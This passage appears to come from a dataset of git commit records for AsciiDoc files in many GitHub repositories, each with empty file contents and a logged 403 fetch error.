unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-ipfiltering.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b8e35e1fbb6e904c1349689af1c6aaa34d78dd0","subject":"testing something","message":"testing something","repos":"kbase\/nextgen,kbase\/nextgen,kbase\/nextgen","old_file":"docs\/challenges\/test_something.asciidoc","new_file":"docs\/challenges\/test_something.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kbase\/nextgen.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"577dc28f0040246534e9a7df165fdd0aa8689669","subject":"formatting and minor additions","message":"formatting and minor additions\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2908518f9f3d67240efabbd10b2b5cb5709d9dd6","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-transform-headers","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-transform-headers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e3684eb35de7cd62f1407358ddd048cbfac78ce","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"800dec80661362f967f9ed58acbc581372dbed14","subject":"Update 2018-11-01-gohu-netlify.adoc","message":"Update 2018-11-01-gohu-netlify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7e4686c36f87f70e95d98982cc6a0ef8cabacee","subject":"git: Add a `prerequisites` section to the readme","message":"git: Add a `prerequisites` section to the readme\n\nThe prerequisites section lists all the software that users will have to\ninstall if they want to use the configuration. Additionally the versions\nof the software should be listed, so that no incompatabilities arise.\n","repos":"PigeonF\/.dotfiles","old_file":"git\/README.adoc","new_file":"git\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec947bf5d3649f13844f6e5dc86280be91da69bc","subject":"deref","message":"deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/03\/11\/deref.adoc","new_file":"content\/news\/2022\/03\/11\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5f540ecb88cbc281b5fb15d073fa7ad647ba4a4c","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a22dc335d0020d73384b1ea71fabd342cfc15b6d","subject":"Update 2016-08-27.adoc","message":"Update 2016-08-27.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"_posts\/2016-08-27.adoc","new_file":"_posts\/2016-08-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52f27805e3b28948f3b9e5438cf3bb50bce83bcd","subject":"Deleted 2015-5-10-uGUI.adoc","message":"Deleted 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7747003a135ab59912015310d1f6117c8c11fd01","subject":"Publish 2015-5-10-uGui.adoc","message":"Publish 2015-5-10-uGui.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGui.adoc","new_file":"2015-5-10-uGui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab322da24c66555248c2c5d154fa7b9e2457ff1d","subject":"Upd links","message":"Upd links\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"DevOps\/IBM Cloud.adoc","new_file":"DevOps\/IBM Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32b7226290bcc0004fdf42f25c594abee6101294","subject":"Added BinTray","message":"Added BinTray\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb23c7afb059cb8cce8f60fe396a592df7995916","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e335b52a58126bbc4c372750af30e5eee6ba461","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24dda127f9ad9febc2b27c4758785674d2e550cf","subject":"Delete README-es.adoc","message":"Delete README-es.adoc","repos":"gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io","old_file":"README-es.adoc","new_file":"README-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsha0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab82e2abb212dc289495d7498e4112601b6e1858","subject":"Delete README-ja.adoc","message":"Delete README-ja.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c69cebfa1f6e42f1fc3a43f60efa8beb6b586a4","subject":"tickle build","message":"tickle build","repos":"mhaberler\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,mhaberler\/machinekit,mhaberler\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,mhaberler\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,strahlex\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araisrobo\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"510a1a1cac2c37d3c7974a3a867a6935b97cce0d","subject":"Docs: Replace deprecated pluginList with Arrays.asList (#24270)","message":"Docs: Replace deprecated pluginList with Arrays.asList (#24270)\n\nESIntegTestCase#pluginList was remove removed in ES 5.0. We are using Arrays.asList instead.","repos":"strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc","old_file":"docs\/reference\/testing\/testing-framework.asciidoc","new_file":"docs\/reference\/testing\/testing-framework.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra5-rc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"20d5b378e6ec61f1c27811376f8e8183ca345e71","subject":"typo in performance.adoc (#929)","message":"typo in performance.adoc (#929)\n\n","repos":"takezoe\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/performance.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/performance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elastic\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed389c170da3c58aab6ddbded70d3fd7fede0beb","subject":"fix link rendering (#1016)","message":"fix link rendering (#1016)\n\n","repos":"scholzj\/barnabas,ppatierno\/kaas,ppatierno\/kaas,scholzj\/barnabas","old_file":"documentation\/book\/proc-kafka-inline-logging.adoc","new_file":"documentation\/book\/proc-kafka-inline-logging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scholzj\/barnabas.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e852a2ac7758eda0240d33dce7d4c3903c5cd9c","subject":"Update 2018-03-12-P-H-Per-Golang.adoc","message":"Update 2018-03-12-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-12-P-H-Per-Golang.adoc","new_file":"_posts\/2018-03-12-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc7c96f519317df62c881fb179cc2a368b90baee","subject":"Eclipse wording","message":"Eclipse wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Dev tools\/Exercice.adoc","new_file":"Dev tools\/Exercice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad631b0c6e465dea4c2e08725282993e1102d4ee","subject":"add post","message":"add post\n","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2017-04-04-Unit-tests-python.adoc","new_file":"_posts\/2017-04-04-Unit-tests-python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9835e61744e20e7191144fd9d37ab2218f860933","subject":"Update 2019-03-21-consider-database.adoc","message":"Update 2019-03-21-consider-database.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-21-consider-database.adoc","new_file":"_posts\/2019-03-21-consider-database.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"148b5d7cccaef25d4406a1fe51e41fc52d4bf938","subject":"re-organizing after meeting","message":"re-organizing after meeting\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f5b1cdb851fc84c2355dd733d2ff05dd27bcba5","subject":"Create troubleshooting.asciidoc","message":"Create troubleshooting.asciidoc","repos":"openshift-evangelists\/vagrant-origin,openshift-evangelists\/vagrant-origin","old_file":"troubleshooting.asciidoc","new_file":"troubleshooting.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openshift-evangelists\/vagrant-origin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0df5ea7c8bd94a3aa693473efb959b62002ac9c1","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02b614c690ac2e25065132760aaee92b26d51904","subject":"[docs] Remove flume kerberos limitation","message":"[docs] Remove flume kerberos limitation\n\nRemoves the flume kerberos limitation as it was resolved\nvia KUDU-2012.\n\nChange-Id: Ied4704fc16b18fe0ee93570c3cbbbf6f61da8a4a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12978\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee8e3684cfaba11bf009b9aac9631aeb4c3fd72b","subject":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","message":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63367cceac92c5611a3d699e55308bb844636fcc","subject":"Update 2016-09-06-TWCTF-Writeups.adoc","message":"Update 2016-09-06-TWCTF-Writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9712e9bde1b9daa65889359228575aff3877b01","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac3c5b2afd7a90c64d600e8a33c4cb3bafe403d6","subject":"S6 S7","message":"S6 S7\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5395d718ab16f67417318321638b8c9fefdfb1b1","subject":"Update 2015-10-05-Hell-Cell-Number-3.adoc","message":"Update 2015-10-05-Hell-Cell-Number-3.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-Hell-Cell-Number-3.adoc","new_file":"_posts\/2015-10-05-Hell-Cell-Number-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd97567b8605e1dc1f735c77b6000ba7be41c102","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"061cf01dc01f920be4881ac55df61dacf9e53a52","subject":"Update 2019-03-10-And-thats-an-Email.adoc","message":"Update 2019-03-10-And-thats-an-Email.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9de7320d6cd878442f91e7856d077a811cdb4147","subject":"Add contributing guide","message":"Add contributing guide\n","repos":"maxamillion\/origin,pweil-\/origin,jprukner\/origin,jpeeler\/origin,mingderwang\/origin,y0no\/origin,tnozicka\/origin,ashcrow\/origin,biyiklioglu\/origin,thrasher-redhat\/origin,mrogers950\/origin,dobbymoodge\/origin,sjug\/origin,grdryn\/origin,deads2k\/origin,Tlacenka\/origin,sseago\/origin,swizzley\/origin,xuant\/origin,benjaminapetersen\/origin,biyiklioglu\/origin,rhamilto\/origin,burmanm\/origin,marun\/origin,elyscape\/origin,tnozicka\/origin,Nick-Harvey\/origin,abutcher\/origin,pkdevbox\/origin,dustintownsend\/origin,janetkuo\/origin,sseago\/origin,chlunde\/origin,marun\/origin,markllama\/atomic-enterprise,romanbartl\/origin,dcbw\/origin,jwforres\/origin,jprukner\/origin,childsb\/origin,sseago\/origin,jwhonce\/origin,jprukner\/origin,anpingli\/origin,dinhxuanvu\/origin,lorenzogm\/openshift-origin,ingvagabund\/origin,raffaelespazzoli\/origin,moolitayer\/origin,allevo\/origin,jupierce\/origin,spohnan\/origin,tdawson\/origin,benjaminapetersen\/origin,smarterclayton\/origin,pombredanne\/atomic-enterprise,craigmunro\/origin,EricMountain-1A\/openshift-origin,gashcrumb\/origin,hferentschik\/origin,sgallagher\/origin,detiber\/origin,Nick-Harvey\/origin,jhadvig\/origin,StevenLudwig\/origin,vongalpha\/origin,linzhaoming\/origin,marsmensch\/atomic-enterprise,joshuawilson\/origin,rajkotecha\/origin,dustintownsend\/origin,lixueclaire\/origin,imcsk8\/origin,detiber\/origin,rajkotecha\/origin,ncdc\/origin,sg00dwin\/origin,hferentschik\/origin,gruiz17\/origin,domenicbove\/origin,liangxia\/origin,thrasher-redhat\/origin,stackdocker\/origin,akram\/origin,cgwalters\/origin,liggitt\/origin,tiwillia\/origin,craigmunro\/origin,nak3\/origin,jeffvance\/origin,mfisher-rht\/origin,joshuawilson\/origin,oybed\/origin,rchicoli\/openshift-origin,zofuthan\/origin,swizzley\/origin,gesrat-cisco\/origin,yarko\/origin,dmage\/origin,y0no\/origin,dobbymoodge\/origin,pombredanne\/atomic-enterprise,rhuss\/origin,aveshagarwal\/origin,pkdevbox\/origin,danwinship\/origin,gruiz17\/origin,gesrat-cisco\/origin,miminar\/atomic-enterprise,sseago\/origin,sg00dwin\/origin,imcsk8\/origin,oybed\/origin,Jandersoft\/origin,fabianofranz\/origin,liangxia\/origin,liggitt\/origin,projectatomic\/atomic-enterprise,spinolacastro\/origin,mjisyang\/origin,spadgett\/origin,benjaminapetersen\/origin,pmorie\/origin,rchicoli\/openshift-origin,mahak\/origin,liggitt\/origin,thesteve0\/origin,pacoja84\/origin,dcrisan\/origin,burmanm\/origin,domenicbove\/origin,barrett-vegas-com\/origin,php-coder\/origin,greyfairer\/openshift-origin,myfear\/origin,maleck13\/origin,westmisfit\/origin,zhaosijun\/origin,adietish\/origin,grdryn\/origin,mdshuai\/origin,dgoodwin\/origin,jim-minter\/origin,jhammant\/origin,jdnieto\/origin,myfear\/origin,imcsk8\/origin,lixueclaire\/origin,grdryn\/origin,bowenha2\/origin,Jandersolutions\/origin,stefwalter\/origin,rrati\/origin,pecameron\/origin,maleck13\/origin,imcsk8\/origin,stefwalter\/origin,dustintownsend\/origin,lorenzogm\/openshift-origin,asiainfoLDP\/datafactory,tracyrankin\/origin,nitintutlani\/origin,php-coder\/origin,moolitayer\/origin,dkorn\/origin,linux-on-ibm-z\/origin,gashcrumb\/origin,kargakis\/origin,jhadvig\/origin,dgoodwin\/origin,linearregression\/origin,ocsbrandon\/origin,rhuss\/origin,linearregression\/origin,rootfs\/origin,rusenask\/origin,wjiangjay\/origin,ashcrow\/origin,ironcladlou\/origin,bowenha2\/origin,danwinship\/origin,dmage\/origin,janetkuo\/origin,chmouel\/origin,kargakis\/origin,robertol\/origin,deads2k\/origin,y0no\/origin,jsafrane\/origin,moolitayer\/origin,sseago\/origin,sallyom\/origin,dustintownsend\/origin,mrogers950\/origin,vongalpha\/origin,YannMoisan\/origin,fkirill\/origin,oybed\/origin,hferentschik\/origin,sgallagher\/origin,pmorie\/origin,arilivigni\/origin,tnozicka\/origin,nak3\/origin,thrasher-redhat\/origin,aveshagarwal\/origin,marsmensch\/atomic-enterprise,rootfs\/origin,mkumatag\/origin,tnozicka\/origin,smunilla\/origin,Jandersolutions\/origin,ryanj\/origin,asiainfoLDP\/datafactory,pkdevbox\/origin,tagoh\/origin,jhammant\/origin,deads2k\/origin,tracyrankin\/origin,Nick-Harvey\/origin,stackdocker\/origin,samsong8610\/origin,smarterclayton\/origin,swizzley\/origin,jwhonce\/origin,legionus\/origin,StevenLudwig\/origin,jwforres\/origin,spadgett\/origin,php-coder\/origin,benjaminapetersen\/origin,mkumatag\/origin,ironcladlou\/origin,xuant\/origin,christian-posta\/origin,allevo\/origin,pombredanne\/atomic-enterprise,inlandsee\/origin,jpeeler\/origin,chmouel\/origin,samsong8610\/origin,tjanez\/origin,pgmcd\/origin,miminar\/origin,pacoja84\/origin,php-coder\/origin,wjiangjay\/origin,mfojtik\/origin,thesteve0\/origin,myfear\/origin,jeremyeder\/origin,openshift\/origin,detiber\/origin,pgmcd\/origin,mingderwang\/origin,samsong8610\/origin,miminar\/origin,juanvallejo\/origin,mnagy\/origin,kargakis\/origin,levivic\/origin,ironcladlou\/origin,wjiangjay\/origin,tagoh\/origin,zofuthan\/origin,rafabene\/origin,chmouel\/origin,pgmcd\/origin,spohnan\/origin,samsong8610\/origin,tiwillia\/origin,cgwalters\/origin,yarko\/origin,luciddreamz\/origin,vongalpha\/origin,wjiangjay\/origin,rajkotecha\/origin,jupierce\/origin,eparis\/origin,romanbartl\/origin,jwforres\/origin,adelton\/origin,seveillac\/origin,hferentschik\/origin,derekwaynecarr\/origin,enj\/origin,aweiteka\/origin,burmanm\/origin,akram\/origin,xuant\/origin,liggitt\/origin,ejemba\/origin,Jandersoft\/origin,rusenask\/origin,goern\/origin,swizzley\/origin,wjiangjay\/origin,willmtemple\/origin,levivic\/origin,PI-Victor\/origin,danwinship\/origin,rajatchopra\/origin,fabianofranz\/origin,enj\/origin,greyfairer\/openshift-origin,imcsk8\/origin,spinolacastro\/origin,StevenLudwig\/origin,mahak\/origin,ingvagabund\/origin,akram\/origin,hingstarne\/origin,ravisantoshgudimetla\/origin,eparis\/origin,ravisantoshgudimetla\/origin,enj\/origin,mrogers950\/origin,mnagy\/origin,rhuss\/origin,knobunc\/origin,HyunsooKim1112\/origin,hingstarne\/origin,EricMountain-1A\/openshift-origin,westmisfit\/origin,tjanez\/origin,legionus\/origin,jhadvig\/origin,sgallagher\/origin,soltysh\/origin,burmanm\/origin,mfisher-rht\/origin,rajatchopra\/origin,thesteve0\/origin,ncdc\/origin,Tlacenka\/origin,rhcarvalho\/origin,wyue-redhat\/origin,myfear\/origin,sosiouxme\/origin,mdshuai\/origin,janetkuo\/origin,liggitt\/origin,jsafrane\/origin,rhuss\/origin,Tlacenka\/origin,smunilla\/origin,hroyrh\/origin,romanbartl\/origin,arilivigni\/origin,danwinship\/origin,ravisantoshgudimetla\/origin,hingstarne\/origin,joshuawilson\/origin,jwforres\/origin,dustintownsend\/origin,dcrisan\/origin,tjcunliffe\/origin,sdminonne\/origin,elyscape\/origin,ncdc\/origin,projectatomic\/atomic-enterprise,dcbw\/origin,levivic\/origin,markllama\/origin,greyfairer\/openshift-origin,rafabene\/origin,anpingli\/origin,maxamillion\/origin,php-coder\/origin,adelton\/origin,xuant\/origin,barrett-vegas-com\/origin,burmanm\/origin,matthyx\/origin,seveillac\/origin,rusenask\/origin,stackdocker\/origin,louyihua\/origin,lixueclaire\/origin,Tlacenka\/origin,jdnieto\/origin,StevenLudwig\/origin,raffaelespazzoli\/origin,stefwalter\/origin,jeremyeder\/origin,jeremyeder\/origin,mrogers950\/origin,liangxia\/origin,dcrisan\/origin,kargakis\/origin,ibotty\/origin,louyihua\/origin,Jandersoft\/origin,mnagy\/origin,dcrisan\/origin,pravisankar\/origin,robertol\/origin,liangxia\/origin,y0no\/origin,hingstarne\/origin,danwinship\/origin,benjaminapetersen\/origin,juanvallejo\/origin,tjcunliffe\/origin,coreydaley\/origin,ocsbrandon\/origin,Jandersoft\/origin,jwfo